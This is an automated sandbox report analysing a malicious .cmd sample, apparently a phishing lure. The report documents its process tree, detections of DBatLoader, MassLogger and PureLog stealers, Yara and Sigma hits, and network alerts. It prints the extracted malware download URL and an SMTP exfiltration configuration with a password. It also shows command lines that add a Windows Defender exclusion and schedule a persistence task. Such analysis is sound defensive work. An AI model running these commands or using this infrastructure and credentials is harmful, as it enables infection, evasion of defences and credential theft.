Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_KB#67897.cmd

Overview

General Information

Sample name:PO_KB#67897.cmd
Analysis ID:1582352
MD5:4eb1270d4006c687782644391aa435d3
SHA1:bf92d77c0f777ba31d635c049200774604dea87f
SHA256:cdc5d714c1b295153567e4047bb0d907a18e6b80863ac159ad4d1777d8919ee3
Tags:cmduser-julianmckein
Infos:

Detection

DBatLoader, MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Drops large PE files
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 964 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_KB#67897.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 516 cmdline: extrac32 /y "C:\Users\user\Desktop\PO_KB#67897.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • x.exe (PID: 5792 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 9B151296A899B0D58575CDE4E9563D18)
      • cmd.exe (PID: 6228 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • rpkhzpuO.pif (PID: 3080 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
        • Trading_AIBot.exe (PID: 3404 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
          • powershell.exe (PID: 1584 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 3784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 3536 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 4340 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • apihost.exe (PID: 2128 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 8D01E7CA64DB66A5D357A071C6E39643)
        • Microsofts.exe (PID: 3248 cmdline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe" MD5: F6B8018A27BCDBAA35778849B586D31B)
  • Oupzhkpr.PIF (PID: 2724 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: 9B151296A899B0D58575CDE4E9563D18)
    • cmd.exe (PID: 5900 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rpkhzpuO.pif (PID: 1656 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Oupzhkpr.PIF (PID: 2216 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: 9B151296A899B0D58575CDE4E9563D18)
    • cmd.exe (PID: 5880 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rpkhzpuO.pif (PID: 6028 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Oupzhkpr.PIF (PID: 7056 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: 9B151296A899B0D58575CDE4E9563D18)
    • cmd.exe (PID: 3080 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rpkhzpuO.pif (PID: 1080 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
{"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}
{"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        C:\Users\user\AppData\Local\Temp\Microsofts.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x101cd:$a1: get_encryptedPassword
        • 0x10509:$a2: get_encryptedUsername
        • 0xff5a:$a3: get_timePasswordChanged
        • 0x1007b:$a4: get_passwordField
        • 0x101e3:$a5: set_encryptedPassword
        • 0x11bb3:$a7: get_logins
        • 0x11864:$a8: GetOutlookPasswords
        • 0x11642:$a9: StartKeylogger
        • 0x11b03:$a10: KeyLoggerEventArgs
        • 0x1169f:$a11: KeyLoggerEventArgsEventHandler
        C:\Users\user\AppData\Local\Temp\Microsofts.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
          SourceRuleDescriptionAuthorStrings
          0000001A.00000002.2555582256.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          0000001F.00000002.2695514518.000000002EA63000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0000000A.00000002.3379727606.0000000002A2F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000001F.00000002.2698667477.000000002ECD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 47 entries
                SourceRuleDescriptionAuthorStrings
                21.2.rpkhzpuO.pif.36680000.11.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  26.2.rpkhzpuO.pif.2d0c3f56.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    21.2.rpkhzpuO.pif.34ad3d90.8.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      31.1.rpkhzpuO.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                      • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                      • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                      • 0x1fdd0:$s5: delete[]
                      • 0x1f288:$s6: constructor or from DllMain.
                      21.2.rpkhzpuO.pif.36680000.11.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Click to see the 121 entries

                        System Summary

                        barindex
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5792, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5792, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 3080, ProcessName: rpkhzpuO.pif
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5792, TargetFilename: C:\Windows \SysWOW64\svchost.exe
                        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5792, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Oupzhkpr.PIF" , ParentImage: C:\Users\Public\Libraries\Oupzhkpr.PIF, ParentProcessId: 2724, ParentProcessName: Oupzhkpr.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 5900, ProcessName: cmd.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 3404, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1584, ProcessName: powershell.exe
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5792, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5792, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 3080, ProcessName: rpkhzpuO.pif
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 3404, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1584, ProcessName: powershell.exe
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 3404, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 3404, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f, ProcessId: 4340, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 3404, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f, ProcessId: 4340, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 3404, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1584, ProcessName: powershell.exe
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-30T11:46:57.454696+010020283713Unknown Traffic192.168.2.64971241.185.8.252443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-30T11:47:04.894030+010028032742Potentially Bad Traffic192.168.2.649720193.122.130.080TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeAvira: detection malicious, Label: TR/Dropper.Gen
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeAvira: detection malicious, Label: TR/Dropper.Gen
                        Source: PO_KB#67897.cmdMalware Configuration Extractor: DBatLoader {"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}
                        Source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}
                        Source: C:\Users\Public\Libraries\Oupzhkpr.PIFReversingLabs: Detection: 18%
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeReversingLabs: Detection: 95%
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 18%
                        Source: PO_KB#67897.cmdVirustotal: Detection: 24%Perma Link
                        Source: PO_KB#67897.cmdReversingLabs: Detection: 28%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJoe Sandbox ML: detected

                        Location Tracking

                        barindex
                        Source: unknownDNS query: name: reallyfreegeoip.org

                        Compliance

                        barindex
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 8.2.rpkhzpuO.pif.400000.3.unpack
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 21.2.rpkhzpuO.pif.400000.0.unpack
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 26.2.rpkhzpuO.pif.400000.0.unpack
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 31.2.rpkhzpuO.pif.400000.0.unpack
                        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49726 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.6:49712 version: TLS 1.2
                        Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdb source: rpkhzpuO.pif, 00000015.00000002.2531569622.0000000031ACA000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001F.00000002.2692149290.000000002D0CB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbIL source: rpkhzpuO.pif, 0000001F.00000002.2692149290.000000002D0CB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdb source: x.exe, 00000004.00000002.2212967585.0000000020800000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F260000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2209421224.0000000000AE0000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020819000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: _.pdb source: rpkhzpuO.pif, 00000008.00000003.2176410380.000000002350A000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2276789747.0000000027A90000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2262951312.0000000025133000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000002.2272905069.00000000264E5000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000002.2565470254.0000000033743000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000002.2626188397.0000000034A95000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000002.2627942016.0000000035F30000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000015.00000003.2314988058.0000000031AE5000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000002.2644300802.000000002E2E5000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001A.00000002.2646464054.000000002F7C0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 